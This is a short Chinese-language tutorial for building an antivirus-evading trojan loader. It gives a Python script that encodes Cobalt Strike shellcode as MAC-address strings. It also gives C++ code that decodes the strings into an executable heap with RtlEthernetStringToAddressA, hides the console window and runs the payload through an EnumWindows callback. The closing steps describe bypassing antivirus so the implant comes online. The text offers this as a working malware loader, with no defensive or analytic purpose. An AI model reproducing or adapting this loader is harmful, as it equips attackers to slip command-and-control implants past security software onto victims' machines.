1、首先生成CS的shellcode
2、 讲shellcode放入python脚本加密为MAC地址形式
def convertToMAC(shellcode):
if len(shellcode) % 6 != 0:
print("\n[*] length:", len(shellcode) + (6 - (len(shellcode) % 6)))
addNullbyte = b"\x00" * (6 - (len(shellcode) % 6))
shellcode += addNullbyte
mac = []
for i in range(0, len(shellcode), 6):
tmp_mac = ""
for j in shellcode[i:i + 6]:
if len(hex(j).replace("0x", "")) == 1:
tmp_mac = tmp_mac + "0" + hex(j).replace("0x", "").upper() + "-"
else:
tmp_mac = tmp_mac + hex(j).replace("0x", "").upper() + "-"
mac.append(tmp_mac[:-1])
return mac
if __name__ == '__main__':
buf = b'''shellcode_here'''
u = convertToMAC(buf)
print(str(u).replace("'", "\""))
3、使用c++的RtlEthernetStringToAddressA函数(该函数将以太网 MAC 地址的字符串表示形式转换为以太网地址的二进制格式)将shellcode转换,最后使用回调执行shellcode。
#include<Windows.h>
#include <iostream>
#include<ip2string.h>
#pragma comment(lib,"Ntdll.lib")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // Windows 控制台程序 不弹 黑窗口
//将转换后的shellcode(shellcode->mac)
const char* mac_[] =
{
MAC_here
};
int main()
{
HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);//在进程的虚拟地址空间中保留空间
void* SB = HeapAlloc(hc, 0, 0x100000);//申请内存
DWORD_PTR hptr = (DWORD_PTR)SB;
int elems = sizeof(mac_) / sizeof(mac_[0]);
PCSTR Terminator = "";
for (int i = 0; i < elems; i++) {
if (RtlEthernetStringToAddressA(mac_[i], &Terminator, (DL_EUI48*)hptr) == STATUS_INVALID_PARAMETER)
{
printf("ERROR!");
return 0;
}
hptr += 6;
}
EnumWindows((WNDENUMPROC)SB, 0);
}
4、生成免杀后的木马
5、执行绕过杀软上线